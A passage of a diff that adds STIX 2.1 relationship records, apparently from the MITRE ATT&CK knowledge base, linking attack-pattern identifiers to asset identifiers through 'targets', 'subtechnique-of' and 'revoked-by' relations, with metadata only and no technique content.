"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e02ef41-f67c-4ede-a05d-6bb0c105a76f", + "created": "2024-06-26T15:39:14.877Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:39:14.877Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e23ebcf-26d5-4417-89e3-b59d223f58ae", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e48de71-12f0-4096-8483-f4bb69adde82", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e5f5721-411f-4012-8f52-26e24f6782ea", + "created": "2023-09-08T15:39:53.135Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-08T15:39:53.135Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e674c85-bd93-4b5c-97c5-8abfdf334770", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e6d2854-fff8-4d05-8e12-9bde487af72f", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e6e5b6b-52d4-4ad3-beae-ad80a201656d", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e742181-6768-4a5e-b748-61c1c4a5520c", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e743193-6a74-422a-bdea-c0d4abbf9ad9", + "created": "2020-01-19T16:54:28.884Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", + "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e7849fa-3c9a-475a-a19d-e5f8cf717307", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e9647cd-da06-47b0-b3be-79e44b5b159f", + "created": "2024-06-26T15:28:40.142Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:28:40.142Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e9f6d7d-f044-4942-8199-7ca71b4b1b2d", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ea67803-07f3-4ce8-a77c-6ef444a1226f", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6eaef4b3-227b-47b3-b4a9-3aa1de4aab26", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6eafa3e9-f53f-43b5-ac24-1415b05b537f", + "created": "2024-03-26T15:42:22.024Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-26T15:42:22.024Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ec74354-a80e-45d9-8097-bfa7c3122b9b", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f02ebe4-0421-4745-b322-0a74e0a81a77", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f1479d9-dfd4-4baa-abd5-9847781ef9bf", + "created": "2023-09-29T17:41:50.116Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:41:50.116Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f21c587-78e8-40df-bf45-00d70e63d80f", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f234854-9429-468b-80f7-27f1b8b0c6d3", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f2ddada-d7df-4788-b5d1-9add185142e0", + "created": "2023-09-28T20:02:57.330Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:02:57.330Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f72c60e-2739-40b6-b6a9-66d2a3d1833e", + "created": "2023-09-28T21:27:14.172Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:27:14.172Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f75a833-d53e-41bb-942b-cef4f3f076c3", + "created": "2022-04-20T21:06:07.562Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "description": "", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", + "target_ref": "attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f76a83b-5c85-4f07-a42b-608c31302433", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f7a4f3f-44ee-491f-be50-caa928214111", + "created": "2021-10-15T20:15:41.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f866589-41c0-4584-9eab-fd62995f860e", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f8f0ee6-af58-4abc-94d9-86dbcdd57741", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f94217a-fa8a-4260-b87f-0fc55ed68f6e", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6f950c91-125b-46a0-aa40-239b4de2306a", + "created": "2023-09-28T21:14:03.305Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:14:03.305Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6fbfcaa5-aaee-4053-b592-717fad775ed7", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6fd0baf2-3aa3-4016-b59b-7d1e961b0c95", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6fef889f-cd69-4612-b8db-4fd617b561fa", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ff63ae8-376e-4974-bd84-0e3664c5d8c8", + "created": "2024-06-27T09:15:03.311Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:15:03.311Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--70199b6c-99f7-4800-854d-7128f90fd13e", + "created": "2024-05-30T15:43:40.698Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-30T15:43:40.698Z", + "description": "Asset Mapping Rationale: ", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--70290a07-69b9-4c55-ab0d-95ef2682e199", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--70337819-8682-43e4-971c-c0c0699f2bef", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--70356711-4a34-4677-b2fc-da5a8b8d7ee6", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7083356e-b0a6-4fff-ac50-6d0ea2a841bc", + "created": "2020-01-31T18:58:17.423Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3", + "target_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { 